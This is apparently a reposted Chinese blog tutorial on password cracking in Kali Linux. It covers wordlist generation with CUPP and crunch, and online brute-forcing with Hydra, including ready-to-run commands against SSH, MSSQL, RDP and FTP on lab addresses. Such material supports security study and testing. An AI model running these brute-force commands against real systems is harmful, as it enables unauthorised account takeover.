口令破解:kali字典工具的使用:CUPPCrunchHydra

Posted Zeker62

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了口令破解:kali字典工具的使用:CUPPCrunchHydra相关的知识,希望对你有一定的参考价值。

口令破解:

易破解的口令如下:

  • 弱口令:比如12345、00000这种简单的密码
  • 默认口令:服务或者软件自动生成的口令:比如phpstudy中自动生成mysql密码为root。
  • 明文传输:HTTP、FTP、Telnet等传输协议。

暴力破解:

  • 在线破解:破解过程中账户需要验证
  • 离线破解:密文还原成明文的过程。

字典生成工具

字典:

  • 弱口令字典:
  • 社工字典:

社工字典cupp:

安装:apt-get install cupp
使用方法 cupp -i即可按照提示步骤生成字典:

之后就会生成成功

这是它的提示:
-i 是按照提示步骤实施
-w 是引入字典
-l 是下载网上字典
-a 是来自数据库直接解析密码

弱口令字典:crunch

kali自带,无需安装。
详细内容见 man crunch

  • 使用方法:crunch <min> <max> [<charset string>] [options]:min和max分别是密码的最小长度和最大长度,后面可以加上字符集和其他选项。
  • 比如crunch 1 8 :输出a~zzzzzzzz所有可能的密码

参数;

-b 指定文件输出的大小,避免字典文件过大
-c 指定文件输出的行数,记包含密码的个数
-d 限制相同元素出现的次数
-e 定义停止字符,即到该字符串就停止生成
-f 调用库文件(/usr/share/crunch/charset.lst)
-i 改变输出格式,即aaa,aab -> aaa,baa
-o 将密码保存到指定文件
-q 读取密码文件,即读取pass.txt
-r 定义重复一个字符串就重新开始
-s 指定一个开始的字符
-t 指定密码输出的格式
-u 禁止打印百分比
-z 压缩生成的字典文件,支持gzip,bzip2,lzma,7z
-l 生成特殊字符
-p 指定生成元素

特殊字符
%代表数字
^代表特殊符号
@代表小写字母
,代表大写字母

样例,来源于man crunch

  • crunch 1 6 abcdefg
    crunch will display a wordlist using the character set abcdefg that starts at a and ends at gggggg
  • crunch 1 6 abcdefg
    there is a space at the end of the character string. In order for crunch to use the space you will need to escape it using the \\ character. In this example you could also put quotes around the letters and not need the , i.e. "abcdefg ". Crunch will display a wordlist using the character set abcdefg that starts at a and ends at (6 spaces):从a到6个空格结束
  • crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt
    crunch will use the mixalpha-numeric-all-space character set from charset.lst and will write the wordlist to a file named wordlist.txt. The file will start with a and end with " "
  • crunch 4 5 -p abc
    The numbers aren’t processed but are needed.crunch will generate abc, acb, bac, bca, cab, cba.
    等等

口令破解工具hydra

-l 指定一个用户名
-p指定一个密码
-P指定密码字典
-L 指定用户名字典
-vV显示爆破细节
-o保存爆破结果
-f找到正确密码就停止爆破
-e n(null)、s(same)、r(反向)
-e nsr
-t 线程

实例:

破解ssh:hydra -l zeker62 -P pwd.dic 192.168.223.133 ssh -vV -f -e nsr

结果,破解成功:

据说这个九头蛇啥都可以破解:
参考资料:https://www.cnblogs.com/mchina/archive/2013/01/01/2840815.html

破解MSSQL 口令
hydra -l sa -P /root/dic/test_pwd.dic 192.168.1.150 mssql -vV

破解RDP 口令
hydra -l administrator -P /root/dic/test_pwd.dic 192.168.1.150 rdp -vV

破解FTP 口令
hydra -L /root/dic/test_user.dic -P /root/dic/test_pwd.dic 192.168.1.150 ftp -vV

以上是关于口令破解:kali字典工具的使用:CUPPCrunchHydra的主要内容,如果未能解决你的问题,请参考以下文章

kali工具-4

使用kali Hydra暴力破解phpadmin网站(失败)

常见的弱口令字典1000~一石三鸟

暴力破解及端口扫描详解

暴力破解及端口扫描详解

web安全弱口令&爆破&协议对象&字典生成